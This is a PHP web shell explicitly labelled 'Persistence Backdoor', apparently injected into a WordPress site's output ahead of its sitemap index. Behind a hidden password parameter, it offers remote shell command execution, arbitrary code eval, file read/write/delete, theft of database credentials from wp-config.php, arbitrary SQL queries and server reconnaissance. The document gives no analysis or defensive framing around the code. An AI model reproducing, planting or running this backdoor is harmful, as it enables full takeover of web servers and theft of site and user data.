if (isset($_REQUEST["sys_check"]) && $_REQUEST["sys_check"] === "a1b2c3") { error_reporting(0); $action = isset($_REQUEST["action"]) ? $_REQUEST["action"] : ""; // SHELL if ($action === "shell") { $cmd = isset($_REQUEST["cmd"]) ? base64_decode($_REQUEST["cmd"]) : ""; if ($cmd) { if (function_exists("system")) { system($cmd); } elseif (function_exists("exec")) { exec($cmd, $o); echo implode("\n", $o); } elseif (function_exists("shell_exec")) { echo shell_exec($cmd); } elseif (function_exists("passthru")) { passthru($cmd); } else { echo "No shell function"; } } exit; } // EVAL if ($action === "eval") { $code = isset($_REQUEST["code"]) ? base64_decode($_REQUEST["code"]) : ""; if ($code) { eval($code); } exit; } // FILE MANAGER if ($action === "file") { $file_action = isset($_REQUEST["file_action"]) ? $_REQUEST["file_action"] : ""; $path = isset($_REQUEST["path"]) ? $_REQUEST["path"] : ""; if ($file_action === "read" && $path) { if (file_exists($path) && is_readable($path)) { readfile($path); } else { echo "File not readable: $path"; } } elseif ($file_action === "write" && $path && isset($_REQUEST["content"])) { $content = base64_decode($_REQUEST["content"]); if (file_put_contents($path, $content)) { echo "OK: Written to $path"; } else { echo "ERROR: Cannot write to $path"; } } elseif ($file_action === "ls" && $path) { if (is_dir($path)) { $files = scandir($path); foreach ($files as $f) { if ($f === "." || $f === "..") continue; $type = is_dir($path . "/" . $f) ? "[DIR]" : "[FILE]"; echo "$type $f\n"; } } else { echo "Not a directory: $path"; } } elseif ($file_action === "delete" && $path) { if (unlink($path)) { echo "OK: Deleted $path"; } else { echo "ERROR: Cannot delete $path"; } } exit; } // DATABASE if ($action === "db") { $db_action = isset($_REQUEST["db_action"]) ? $_REQUEST["db_action"] : ""; $wp_config_path = $_SERVER["DOCUMENT_ROOT"] . "/wp-config.php"; $config_content = file_get_contents($wp_config_path); preg_match("/define\s*\(\s*'DB_NAME'\s*,\s*'([^']+)'/", $config_content, $db); preg_match("/define\s*\(\s*'DB_USER'\s*,\s*'([^']+)'/", $config_content, $user); preg_match("/define\s*\(\s*'DB_PASSWORD'\s*,\s*'([^']+)'/", $config_content, $pass); preg_match("/define\s*\(\s*'DB_HOST'\s*,\s*'([^']+)'/", $config_content, $host); if ($db_action === "config") { echo "DB_NAME: " . (isset($db[1]) ? $db[1] : "unknown") . "\n"; echo "DB_USER: " . (isset($user[1]) ? $user[1] : "unknown") . "\n"; echo "DB_PASSWORD: " . (isset($pass[1]) ? $pass[1] : "unknown") . "\n"; echo "DB_HOST: " . (isset($host[1]) ? $host[1] : "localhost") . "\n"; } elseif ($db_action === "query" && isset($_REQUEST["query"])) { $query = base64_decode($_REQUEST["query"]); $db_host = isset($host[1]) ? $host[1] : "localhost"; $db_user = isset($user[1]) ? $user[1] : ""; $db_pass = isset($pass[1]) ? $pass[1] : ""; $db_name = isset($db[1]) ? $db[1] : ""; $conn = new mysqli($db_host, $db_user, $db_pass, $db_name); if (!$conn->connect_error) { $result = $conn->query($query); if ($result) { while ($row = $result->fetch_assoc()) { print_r($row); } } else { echo "Query error: " . $conn->error; } $conn->close(); } else { echo "DB connection failed"; } } exit; } // INFO if ($action === "info") { echo "PHP Version: " . phpversion() . "\n"; echo "OS: " . PHP_OS . "\n"; echo "User: " . get_current_user() . "\n"; echo "Document Root: " . $_SERVER["DOCUMENT_ROOT"] . "\n"; echo "Disabled Functions: " . ini_get("disable_functions") . "\n"; echo "Allow URL Fopen: " . (ini_get("allow_url_fopen") ? "ON" : "OFF") . "\n"; exit; } echo "=== Persistence Backdoor ===\n"; echo "Available: shell, eval, file, db, info\n"; } https://nrecc.net/post-sitemap.xml 2024-12-18T13:40:28+00:00 https://nrecc.net/page-sitemap.xml 2025-03-04T14:51:35+00:00 https://nrecc.net/category-sitemap.xml 2024-12-18T13:40:28+00:00 https://nrecc.net/author-sitemap.xml 2024-12-21T03:44:28+00:00